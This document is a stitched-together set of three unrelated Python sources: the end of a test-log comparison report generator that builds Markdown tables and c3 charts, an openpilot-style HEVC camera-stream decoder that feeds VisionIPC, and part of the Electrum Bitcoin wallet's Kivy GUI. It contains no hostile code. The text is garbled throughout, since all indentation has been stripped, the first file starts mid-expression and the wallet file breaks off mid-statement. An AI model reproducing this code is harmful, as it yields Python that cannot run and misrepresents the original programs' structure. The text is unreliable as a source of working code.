"values": ",".join([f"'{str(c)}'" for c in data["chart"]["x"]])
}
s = (
'\n\n## Chart\n\n'
'<script src="https://cdnjs.cloudflare.com/ajax/libs/d3/5.15.0/d3.min.js"></script>\n'
'<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/c3/0.7.12/c3.min.css">\n'
'<script src="https://cdnjs.cloudflare.com/ajax/libs/c3/0.7.12/c3.min.js"></script>\n'
'<div><div id="data-chart"></div></div>\n'
'<script>\n'
f'{script}\n'
'</script>'
)
return s
def format(self, data):
body = self.format_metadata(data)
body += self.format_reference(data)
body += self.format_chart(data)
body += self.format_table(data)
return template.strip() % {
"title": "Results",
"logo": self.format_logo(data),
"confidential": self.format_confidential(data),
"copyright": self.format_copyright(data),
"body": body
}
class Handler(HandlerBase):
Formatter = NotImplementedError
@classmethod
def add_arguments(cls, parser):
parser.add_argument("--log", metavar="pattern", type=argtype.logfile("r", bufsize=1, encoding="utf-8"),
nargs="+", help="log file pattern", required=True)
parser.add_argument("--log-link", metavar="attribute",
help="attribute that is used as a link for the log, default: job.url",
type=str, default="job.url")
parser.add_argument("--only", metavar="pattern", nargs="+",
help="compare only selected tests", type=str, required=False)
parser.add_argument("--order-by", metavar="attribute", type=str,
help="attribute that is used to order the logs")
parser.add_argument("--sort", metavar="direction", type=str,
help="sort direction. Either 'asc' or 'desc', default: asc", choices=["asc", "desc"], default="asc")
parser.add_argument("--format", metavar="type", type=str,
help="output format, default: md (Markdown)", choices=["md"], default="md")
parser.add_argument("output", metavar="output", type=argtype.file("w", bufsize=1, encoding="utf-8"),
nargs="?", help='output file, default: stdout', default="-")
parser.add_argument("--copyright", metavar="name", help="add copyright notice", type=str)
parser.add_argument("--confidential", help="mark as confidential", action="store_true")
parser.add_argument("--logo", metavar="path", type=argtype.file("rb"),
help='use logo image (.png)')
def chart(self, counts):
chart = {
"ok": [],
"fail": [],
"known": [],
"x": []
}
for c in reversed(list(counts.values())):
    chart["ok"].append(c.ok)
    chart["fail"].append(c.fail + c.error + c.null)
    chart["known"].append(c.xok + c.xfail + c.xerror + c.xnull)
    chart["x"].append(c.reference)
return chart
def get_attribute(self, result, name, default=None):
tests = list(result["tests"].values())
if not tests:
return default
test = tests[0]["test"]
for attr in test["attributes"]:
if attr["attribute_name"] == name:
return attr["attribute_value"]
return default
def filter(self, tests, only):
if not only:
return tests
filters = []
for pattern in only:
filters.append(The(pattern).at(sep))
_tests = []
for test in tests:
match = False
for filter in filters:
if filter.match(test, prefix=False):
match = True
break
if match:
_tests.append(test)
return _tests
def counts(self, tests, results):
results_counts = {}
for log, result in results.items():
results_counts[log] = Counts("tests", *([0] * 10))
_counts = results_counts[log]
_counts.reference = result["reference"]
for testname in tests:
test = result["tests"].get(testname)
if test and test.get("result"):
if not test["result"].get("result_type"):
raise ValueError(f"no result for '{test['test']['test_name']}'")
_name = test["result"]["result_type"].lower()
setattr(_counts, _name, getattr(_counts, _name) + 1)
_counts.units += 1
return results_counts
def sort(self, results, order_by=None, direction="asc"):
_results = {}
def order_key(v):
started = results[v].get("started", 0)
if order_by:
value = "-"
if results[v].get("tests"):
value = self.get_attribute(results[v], order_by, value)
return [value, started]
return [started]
key_order = sorted(results, key=order_key, reverse=True)
if direction == "desc":
key_order = reversed(key_order)
for i, key in enumerate(key_order):
_results[key] = results[key]
ref = order_key(key)
ref[-1] = f'{localfromtimestamp(ref[-1]):%b %d, %-H:%M}'
if order_by:
ref = f'{ref[0]}, {ref[-1]}'
else:
ref = ref[-1]
_results[key]["reference"] = ref
return _results
def tests(self, results):
tests = []
for r in results.values():
for uname, test in r["tests"].items():
if getattr(TestType, test["test"]["test_type"]) < TestType.Test:
continue
tests.append(uname)
return human(list(set(tests)))
def table(self, tests, results, ref_link=None):
table = {
"header": ["Test Name"] + [f'<a href="#ref-{results[r]["reference"]}">{results[r]["reference"]}</a>' for r in results],
"rows": [],
"reference": {
"header": ["Reference", "Link"],
"rows": [[f'<span id="ref-{results[r]["reference"]}"><strong>{results[r]["reference"]}</strong></span>', self.get_attribute(results[r], str(ref_link), r)] for r in results]
},
}
if not tests:
table["rows"].append([""] * len(results.values()))
for test in tests:
row = [test]
for result in results.values():
if result["tests"].get(test) and result["tests"].get(test).get("result"):
row.append(result["tests"].get(test)["result"])
else:
row.append(None)
table["rows"].append(row)
return table
def metadata(self, only, order_by, direction):
return {
"date": time.time(),
"version": __version__,
"order-by": order_by,
"sort": direction,
"filter": (" ".join(only) if only else "None")
}
def company(self, args):
d = {}
if args.copyright:
d["name"] = args.copyright
if args.confidential:
d["confidential"] = True
if args.logo:
d["logo"] = args.logo.read()
return d
def data(self, results, args):
d = dict()
results = self.sort(results, args.order_by, args.sort)
d["tests"] = self.filter(self.tests(results), args.only)
d["table"] = self.table(d["tests"], results, args.log_link)
d["counts"] = self.counts(d["tests"], results)
d["chart"] = self.chart(d["counts"])
d["metadata"] = self.metadata(args.only, args.order_by, args.sort)
d["company"] = self.company(args)
return d
def generate(self, formatter, results, args):
output = args.output
output.write(
formatter.format(self.data(results, args))
)
output.write("\n")
def handle(self, args):
results = {}
threads = []
def thread_worker(log, results):
ResultsLogPipeline(log, results).run()
for log in args.log:
log_results = {}
threads.append(
threading.Thread(target=thread_worker, args=(log, log_results))
)
results[log.name] = log_results
threads[-1].start()
for thread in threads:
thread.join()
formatter = self.Formatter()
self.generate(formatter, results, args)
|
compressed_vipc.py
|
#!/usr/bin/env python3
import av
import os
import sys
import argparse
import numpy as np
import multiprocessing
import time
import cereal.messaging as messaging
from cereal.visionipc.visionipc_pyx import VisionIpcServer, VisionStreamType # pylint: disable=no-name-in-module, import-error
W, H = 1928, 1208
V4L2_BUF_FLAG_KEYFRAME = 8
def decoder(addr, sock_name, vipc_server, vst, nvidia):
print("start decoder for %s" % sock_name)
if nvidia:
os.environ["NV_LOW_LATENCY"] = "3" # both bLowLatency and CUVID_PKT_ENDOFPICTURE
sys.path += os.environ["LD_LIBRARY_PATH"].split(":")
import PyNvCodec as nvc # pylint: disable=import-error
nvDec = nvc.PyNvDecoder(W, H, nvc.PixelFormat.NV12, nvc.CudaVideoCodec.HEVC, 0)
cc1 = nvc.ColorspaceConversionContext(nvc.ColorSpace.BT_709, nvc.ColorRange.JPEG)
conv_yuv = nvc.PySurfaceConverter(W, H, nvc.PixelFormat.NV12, nvc.PixelFormat.YUV420, 0)
nvDwn_yuv = nvc.PySurfaceDownloader(W, H, nvc.PixelFormat.YUV420, 0)
img_yuv = np.ndarray((H*W//2*3), dtype=np.uint8)
else:
codec = av.CodecContext.create("hevc", "r")
os.environ["ZMQ"] = "1"
messaging.context = messaging.Context()
sock = messaging.sub_sock(sock_name, None, addr=addr, conflate=False)
cnt = 0
last_idx = -1
seen_iframe = False
time_q = []
while 1:
msgs = messaging.drain_sock(sock, wait_for_one=True)
for evt in msgs:
evta = getattr(evt, evt.which())
if evta.idx.encodeId != 0 and evta.idx.encodeId != (last_idx+1):
print("DROP PACKET!")
last_idx = evta.idx.encodeId
if not seen_iframe and not (evta.idx.flags & V4L2_BUF_FLAG_KEYFRAME):
print("waiting for iframe")
continue
time_q.append(time.monotonic())
network_latency = (int(time.time()*1e9) - evta.unixTimestampNanos)/1e6
frame_latency = ((evta.idx.timestampEof/1e9) - (evta.idx.timestampSof/1e9))*1000
process_latency = ((evt.logMonoTime/1e9) - (evta.idx.timestampEof/1e9))*1000
# put in header (first)
if not seen_iframe:
if nvidia:
nvDec.DecodeSurfaceFromPacket(np.frombuffer(evta.header, dtype=np.uint8))
else:
codec.decode(av.packet.Packet(evta.header))
seen_iframe = True
if nvidia:
rawSurface = nvDec.DecodeSurfaceFromPacket(np.frombuffer(evta.data, dtype=np.uint8))
if rawSurface.Empty():
print("DROP SURFACE")
continue
convSurface = conv_yuv.Execute(rawSurface, cc1)
nvDwn_yuv.DownloadSingleSurface(convSurface, img_yuv)
else:
frames = codec.decode(av.packet.Packet(evta.data))
if len(frames) == 0:
print("DROP SURFACE")
continue
assert len(frames) == 1
img_yuv = frames[0].to_ndarray(format=av.video.format.VideoFormat('yuv420p')).flatten()
vipc_server.send(vst, img_yuv.data, cnt, int(time_q[0]*1e9), int(time.monotonic()*1e9))
cnt += 1
pc_latency = (time.monotonic()-time_q[0])*1000
time_q = time_q[1:]
print("%2d %4d %.3f %.3f roll %6.2f ms latency %6.2f ms + %6.2f ms + %6.2f ms = %6.2f ms" % (len(msgs), evta.idx.encodeId, evt.logMonoTime/1e9, evta.idx.timestampEof/1e6, frame_latency, process_latency, network_latency, pc_latency, process_latency+network_latency+pc_latency ), len(evta.data), sock_name)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Decode video streams and broacast on VisionIPC")
parser.add_argument("addr", help="Address of comma three")
parser.add_argument("--nvidia", action="store_true", help="Use nvidia instead of ffmpeg")
parser.add_argument("--cams", default="0,1,2", help="Cameras to decode")
args = parser.parse_args()
all_cams = [
("roadEncodeData", VisionStreamType.VISION_STREAM_ROAD),
("wideRoadEncodeData", VisionStreamType.VISION_STREAM_WIDE_ROAD),
("driverEncodeData", VisionStreamType.VISION_STREAM_DRIVER),
]
cams = dict([all_cams[int(x)] for x in args.cams.split(",")])
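# Example (illustrative): "--cams 0,2" selects roadEncodeData and
# driverEncodeData only; the default "0,1,2" decodes all three streams.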
vipc_server = VisionIpcServer("camerad")
for vst in cams.values():
vipc_server.create_buffers(vst, 4, False, W, H)
vipc_server.start_listener()
for k,v in cams.items():
multiprocessing.Process(target=decoder, args=(args.addr, k, vipc_server, v, args.nvidia)).start()
|
main_window.py
|
import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
import electrum
from electrum.bitcoin import TYPE_ADDRESS
from electrum import WalletStorage, Wallet
from electrum_gui.kivy.i18n import _
from electrum.paymentrequest import InvoiceStore
from electrum.util import profiler, InvalidPassword
from electrum.plugins import run_hook
from electrum.util import format_satoshis, format_satoshis_plain
from electrum.paymentrequest import PR_UNPAID, PR_PAID, PR_UNKNOWN, PR_EXPIRED
from kivy.app import App
from kivy.core.window import Window
from kivy.logger import Logger
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='electrum_gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='electrum_gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='electrum_gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='electrum_gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble
from .uix.dialogs import OutputList, OutputItem
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
util = False
# register widget cache for keeping memory down; timeout set to forever to
# cache the data
Cache.register('electrum_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='electrum_gui.kivy.uix.screens')
# Register fonts; without this you won't be able to use bold/italic
# inside markup.
from kivy.core.text import Label
Label.register('Roboto',
'gui/kivy/data/fonts/Roboto.ttf',
'gui/kivy/data/fonts/Roboto.ttf',
'gui/kivy/data/fonts/Roboto-Bold.ttf',
'gui/kivy/data/fonts/Roboto-Bold.ttf')
from electrum.util import base_units
class ElectrumWindow(App):
electrum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
blockchain_checkpoint = NumericProperty(0)
auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
host, port, protocol, proxy, auto_connect = self.network.get_parameters()
self.network.set_parameters(host, port, protocol, proxy, self.auto_connect)
def toggle_auto_connect(self, x):
self.auto_connect = not self.auto_connect
def choose_server_dialog(self, popup):
from .uix.dialogs.choice_dialog import ChoiceDialog
protocol = 's'
def cb2(host):
from electrum.bitcoin import NetworkConstants
pp = servers.get(host, NetworkConstants.DEFAULT_PORTS)
port = pp.get(protocol, '')
popup.ids.host.text = host
popup.ids.port.text = port
servers = self.network.get_servers()
ChoiceDialog(_('Choose a server'), sorted(servers), popup.ids.host.text, cb2).open()
def choose_blockchain_dialog(self, dt):
from .uix.dialogs.choice_dialog import ChoiceDialog
chains = self.network.get_blockchains()
def cb(name):
for index, b in self.network.blockchains.items():
if name == self.network.get_blockchain_name(b):
self.network.follow_chain(index)
#self.block
names = [self.network.blockchains[b].get_name() for b in chains]
if len(names) >1:
ChoiceDialog(_('Choose your chain'), names, '', cb).open()
use_rbf = BooleanProperty(False)
def on_use_rbf(self, instance, x):
self.electrum_config.set_key('use_rbf', self.use_rbf, True)
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
self.electrum_config.set_key('use_change', self.use_change, True)
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
def set_URI(self, uri):
self.switch_to('send')
self.send_screen.set_URI(uri)
def on_new_intent(self, intent):
if intent.getScheme() != 'bitcoin':
return
uri = intent.getDataString()
self.set_URI(uri)
def on_language(self, instance, language):
Logger.info('language: {}'.format(language))
_.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
Logger.info("on_quotes")
self._trigger_update_history()
def on_history(self, d):
Logger.info("on_history")
self._trigger_update_history()
def _get_bu(self):
return self.electrum_config.get('base_unit', 'mUBTC')
def _set_bu(self, value):
assert value in base_units.keys()
self.electrum_config.set_key('base_unit', value, True)
self._trigger_update_status()
self._trigger_update_history()
base_unit = AliasProperty(_get_bu, _set_bu)
status = StringProperty('')
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
self._trigger_update_history()
def decimal_point(self):
return base_units[self.base_unit]
def btc_to_fiat(self, amount_str):
if not amount_str:
return ''
rate = self.fx.exchange_rate()
if not rate:
return ''
fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8)
return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
if not fiat_amount:
return ''
rate = self.fx.exchange_rate()
if not rate:
return ''
satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate))
return format_satoshis_plain(satoshis, self.decimal_point())
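# Worked example (illustrative values): at an exchange rate of 20000 fiat/BTC,
# fiat_to_btc("50") computes 10**8 * 50 / 20000 = 250000 satoshis before
# formatting with format_satoshis_plain.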
def get_amount(self, amount_str):
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
p = pow(10, self.decimal_point())
return int(p * x)
_orientation = OptionProperty('landscape',
options=('landscape', 'portrait'))
def _get_orientation(self):
return self._orientation
orientation = AliasProperty(_get_orientation,
None,
bind=('_orientation',))
'''Tries to ascertain the current orientation of the device.
Can be one of `landscape` or `portrait`.
:data:`orientation` is a read only `AliasProperty`. Defaults to 'landscape'
'''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
None,
bind=('_ui_mode',))
'''Tries to ascertain the kind of device the app is running on.
Can be one of `tablet` or `phone`.
:data:`ui_mode` is a read only `AliasProperty`. Defaults to 'phone'
'''
def __init__(self, **kwargs):
# initialize variables
self._clipboard = Clipboard
self.info_bubble = None
self.nfcscanner = None
self.tabs = None
self.is_exit = False
self.wallet = None
App.__init__(self)#, **kwargs)
self.title = _('Electrum App')
self.electrum_config = config = kwargs.get('config', None)
self.language = config.get('language', 'en')
self.network = network = kwargs.get('network', None)
if self.network:
self.num_blocks = self.network.get_local_height()
self.num_nodes = len(self.network.get_interfaces())
host, port, protocol, proxy_config, auto_connect = self.network.get_parameters()
self.server_host = host
self.server_port = port
self.auto_connect = auto_connect
self.proxy_config = proxy_config if proxy_config else {}
self.plugins = kwargs.get('plugins', [])
self.gui_object = kwargs.get('gui_object', None)
self.daemon = self.gui_object.daemon
self.fx = self.daemon.fx
self.use_rbf = config.get('use_rbf', False)
self.use_change = config.get('use_change', True)
self.use_unconfirmed = not config.get('confirmed_only', False)
# create triggers so as to limit updates to a max of 2 times a sec
self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
# cached dialogs
self._settings_dialog = None
self._password_dialog = None
def wallet_name(self):
return os.path.basename(self.wallet.storage.path) if self.wallet else ' '
def on_pr(self, pr):
if pr.verify(self.wallet.contacts):
key = self.wallet.invoices.add(pr)
if self.invoices_screen:
self.invoices_screen.update()
status = self.wallet.invoices.get_status(key)
if status == PR_PAID:
self.show_error("invoice already paid")
self.send_screen.do_clear()
else:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
else:
self.switch_to('send')
self.send_screen.set_request(pr)
else:
self.show_error("invoice error:" + pr.error)
self.send_screen.do_clear()
def on_qr(self, data):
from electrum.bitcoin import base_decode, is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
if data.startswith('bitcoin:'):
self.set_URI(data)
return
# try to decode transaction
from electrum.transaction import Transaction
from electrum.util import bh2u
try:
text = bh2u(base_decode(data, None, base=43))
tx = Transaction(text)
tx.deserialize()
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
def update_tab(self, name):
s = getattr(self, name + '_screen', None)
if s:
s.update()
@profiler
def update_tabs(self):
for tab in ['invoices', 'send', 'history', 'receive', 'requests']:
self.update_tab(tab)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
if s is None:
s = self.tabs.ids[name + '_screen']
s.load_screen()
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
def show_request(self, addr):
self.switch_to('receive')
self.receive_screen.screen.address = addr
def show_pr_details(self, req, status, is_invoice):
from electrum.util import format_time
requestor = req.get('requestor')
exp = req.get('exp')
memo = req.get('memo')
amount = req.get('amount')
fund = req.get('fund')
popup = Builder.load_file('gui/kivy/uix/ui_screens/invoice.kv')
popup.is_invoice = is_invoice
popup.amount = amount
popup.requestor = requestor if is_invoice else req.get('address')
popup.exp = format_time(exp) if exp else ''
popup.description = memo if memo else ''
popup.signature = req.get('signature', '')
popup.status = status
popup.fund = fund if fund else 0
txid = req.get('txid')
popup.tx_hash = txid or ''
popup.on_open = lambda: popup.ids.output_list.update(req.get('outputs', []))
popup.export = self.export_private_keys
popup.open()
def show_addr_details(self, req, status):
from electrum.util import format_time
fund = req.get('fund')
isaddr = 'y'
popup = Builder.load_file('gui/kivy/uix/ui_screens/invoice.kv')
popup.isaddr = isaddr
popup.is_invoice = False
popup.status = status
popup.requestor = req.get('address')
popup.fund = fund if fund else 0
popup.export = self.export_private_keys
popup.open()
def qr_dialog(self, title, data, show_text=False):
from .uix.dialogs.qr_dialog import QRDialog
popup = QRDialog(title, data, show_text)
popup.open()
def scan_qr(self, on_complete):
if platform != 'android':
return
from jnius import autoclass
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
Intent = autoclass('android.content.Intent')
intent = Intent("com.google.zxing.client.android.SCAN")
intent.putExtra("SCAN_MODE", "QR_CODE_MODE")
def on_qr_result(requestCode, resultCode, intent):
if requestCode == 0:
if resultCode == -1: # RESULT_OK:
contents = intent.getStringExtra("SCAN_RESULT")
if intent.getStringExtra("SCAN_RESULT_FORMAT") == 'QR_CODE':
on_complete(contents)
else:
self.show_error("wrong format " + intent.getStringExtra("SCAN_RESULT_FORMAT"))
activity.bind(on_activity_result=on_qr_result)
try:
PythonActivity.mActivity.startActivityForResult(intent, 0)
except:
self.show_error(_('Could not start Barcode Scanner.') + ' ' + _('Please install the Barcode Scanner app from ZXing'))
def scan_qr_zxing(self, on_complete):
# uses zxing embedded lib
if platform != 'android':
return
from jnius import autoclass
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
IntentIntegrator = autoclass('com.google.zxing.integration.android.IntentIntegrator')
integrator = IntentIntegrator(PythonActivity.mActivity)
def on_qr_result(requestCode, resultCode, intent):
if requestCode == 0:
if resultCode == -1: # RESULT_OK:
contents = intent.getStringExtra("SCAN_RESULT")
if intent.getStringExtra("SCAN_RESULT_FORMAT") == 'QR_CODE':
on_complete(contents)
else:
self.show_error("wrong format " + intent.getStringExtra("SCAN_RESULT_FORMAT"))
activity.bind(on_activity_result=on_qr_result)
integrator.initiateScan()
def do_share(self, data, title):
if platform != 'android':
return
from jnius import autoclass, cast
JS = autoclass('java.lang.String')
Intent = autoclass('android.content.Intent')
sendIntent = Intent()
sendIntent.setAction(Intent.ACTION_SEND)
sendIntent.setType("text/plain")
sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
currentActivity.startActivity(it)
def build(self):
return Builder.load_file('gui/kivy/main.kv')
def _pause(self):
if platform == 'android':
# move activity to back
from jnius import autoclass
python_act = autoclass('org.kivy.android.PythonActivity')
mActivity = python_act.mActivity
mActivity.moveTaskToBack(True)
def on_start(self):
''' This is the start point of the kivy ui
'''
import time
Logger.info('Time to on_start: {} <<<<<<<<'.format(time.clock()))
win = Window
win.bind(size=self.on_size, on_keyboard=self.on_keyboard)
win.bind(on_key_down=self.on_key_down)
#win.softinput_mode = 'below_target'
self.on_size(win, win.size)
self.init_ui()
self.load_wallet_by_name(self.electrum_config.get_wallet_path())
# init plugins
run_hook('init_kivy', self)
# fiat currency
self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
# default tab
self.switch_to('history')
# bind intent for bitcoin: URI scheme
if platform == 'android':
from android import activity
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
mactivity = PythonActivity.mActivity
self.on_new_intent(mactivity.getIntent())
activity.bind(on_new_intent=self.on_new_intent)
# connect callbacks
if self.network:
interests = ['updated', 'status', 'new_transaction', 'verified', 'interfaces']
self.network.register_callback(self.on_network_event, interests)
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
# URI passed in config
uri = self.electrum_config.get('url')
if uri:
self.set_URI(uri)
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
def on_wizard_complete(self, instance, wallet):
if wallet:
wallet.start_threads(self.daemon.network)
self.daemon.add_wallet(wallet)
self.load_wallet(wallet)
self.on_resume()
def load_wallet_by_name(self, path):
if not path:
return
wallet = self.daemon.load_wallet(path, None)
if wallet:
if wallet != self.wallet:
self.stop_wallet()
self.load_wallet(wallet)
self.on_resume()
else:
Logger.debug('Electrum: Wallet not found. Launching install wizard')
storage = WalletStorage(path)
wizard = Factory.InstallWizard(self.electrum_config, storage)
wizard.bind(on_wizard_complete=self.on_wizard_complete)
action = wizard.storage.get_action()
wizard.run(action)
def on_stop(self):
self.stop_wallet()
def stop_wallet(self):
if self.wallet:
self.daemon.stop_wallet(self.wallet.storage.path)
self.wallet = None
def on_key_down(self, instance, key, keycode, codepoint, modifiers):
if 'ctrl' in modifiers:
# q=24 w=25
if keycode in (24, 25):
self.stop()
elif keycode == 27:
# r=27
# force update wallet
self.update_wallet()
elif keycode == 112:
# pageup
#TODO move to next tab
pass
elif keycode == 117:
# pagedown
#TODO move to prev tab
pass
#TODO: alt+tab_number to activate the particular tab
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
if key == 27 and self.is_exit is False:
self.is_exit = True
self.show_info(_('Press again to exit'))
return True
# override settings button
if key in (319, 282): #f1/settings button on android
#self.gui.main_gui.toggle_settings(self)
return True
def settings_dialog(self):
from .uix.dialogs.settings import SettingsDialog
if self._settings_dialog is None:
self._settings_dialog = SettingsDialog(self)
self._settings_dialog.update()
self._settings_dialog.open()
def popup_dialog(self, name):
if name == 'settings':
self.settings_dialog()
elif name == 'wallets':
from .uix.dialogs.wallets import WalletDialog
d = WalletDialog()
d.open()
else:
popup = Builder.load_file('gui/kivy/uix/ui_screens/'+name+'.kv')
popup.open()
@profiler
def init_ui(self):
''' Initialize the UX part of Electrum. This function performs the basic
tasks of setting up the ui.
'''
#from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='electrum_gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='electrum_gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('electrum_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('electrum_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.contacts_screen = None
self.send_screen = None
self.invoices_screen = None
self.receive_screen = None
self.requests_screen = None
self.address_screen = None
self.icon = "icons/electrum.png"
self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
self.num_nodes = len(self.network.get_interfaces())
self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_checkpoint = chain.get_checkpoint()
self.blockchain_name = chain.get_name()
if self.network.interface:
self.server_host = self.network.interface.host
def on_network_event(self, event, *args):
Logger.info('network event: '+ event)
if event == 'interfaces':
self._trigger_update_interfaces()
elif event == 'updated':
self._trigger_update_wallet()
self._trigger_update_status()
elif event == 'status':
self._trigger_update_status()
elif event == 'new_transaction':
self._trigger_update_wallet()
elif event == 'verified':
self._trigger_update_wallet()
@profiler
def load_wallet(self, wallet):
self.wallet = wallet
self.update_wallet()
# Once GUI has been initialized check if we want to announce something
# since the callback has been called before the GUI was initialized
if self.receive_screen:
self.receive_screen.clear()
self.update_tabs()
run_hook('load_wallet', wallet, self)
def update_status(self, *dt):
self.num_blocks = self.network.get_local_height()
if not self.wallet:
self.status = _("No Wallet")
return
if self.network is None or not self.network.is_running():
status = _("Offline")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
if not self.wallet.up_to_date or server_height == 0:
status = _("Synchronizing...")
elif server_lag > 1:
status = _("Server lagging (%d blocks)"%server_lag)
else:
c, u, x = self.wallet.get_balance()
text = self.format_amount(c+x+u)
status = str(text.strip() + ' ' + self.base_unit)
else:
status = _("Disconnected")
n = self.wallet.basename()
self.status = '[size=15dp]%s[/size]\n%s' %(n, status)
#fiat_balance = self.fx.format_amount_and_units(c+u+x) or ''
def get_max_amount(self):
inputs = self.wallet.get_spendable_coins(None, self.electrum_config)
addr = str(self.send_screen.screen.address) or self.wallet.dummy_address()
outputs = [(TYPE_ADDRESS, addr, '!')]
tx = self.wallet.make_unsigned_transaction(inputs, outputs, self.electrum_config)
amount = tx.output_value()
return format_satoshis_plain(amount, self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, is_diff, 0, self.decimal_point(), whitespaces)
def format_amount_and_units(self, x):
return format_satoshis_plain(x, self.decimal_point()) + ' ' + self.base_unit
#@profiler
def update_wallet(self, *dt):
self._trigger_update_status()
if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('Electrum', message,
app_icon=icon, app_name='Electrum')
except ImportError:
Logger.error('Notification: needs plyer; `sudo pip install plyer`')
def on_pause(self):
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
return True
def on_resume(self):
if self.nfcscanner:
self.nfcscanner.nfc_enable()
# workaround p4a bug:
# show an empty info bubble, to refresh the display
self.show_info_bubble('', duration=0.1, pos=(0,0), width=1, arrow_pos=None)
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label, touch):
if label.touched:
label.touched = False
self.qr_dialog(label.name, label.data, True)
else:
label.touched = True
self._clipboard.copy(label.data)
Clock.schedule_once(lambda dt: self.show_info(_('Text copied to clipboard.\nTap again to display it as QR code.')))
def set_send(self, address, amount, label, message):
self.send_payment(address, amount=amount, label=label, message=message)
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon='atlas://gui/kivy/theming/light/error', duration=0,
modal=False):
''' Show an error Message Bubble.
'''
self.show_info_bubble( text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
''' Show an Info Message Bubble.
'''
self.show_error(error, icon='atlas://gui/kivy/theming/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
'''Method to show an Information Bubble
.. parameters::
text: Message to be displayed
pos: position for the bubble
duration: duration the bubble remains on screen. 0 = click to hide
width: width of the Bubble
arrow_pos: arrow position for the bubble
'''
info_bubble = self.info_bubble
if not info_bubble:
info_bubble = self.info_bubble = Factory.InfoBubble()
win = Window
if info_bubble.parent:
win.remove_widget(info_bubble
if not info_bubble.modal else
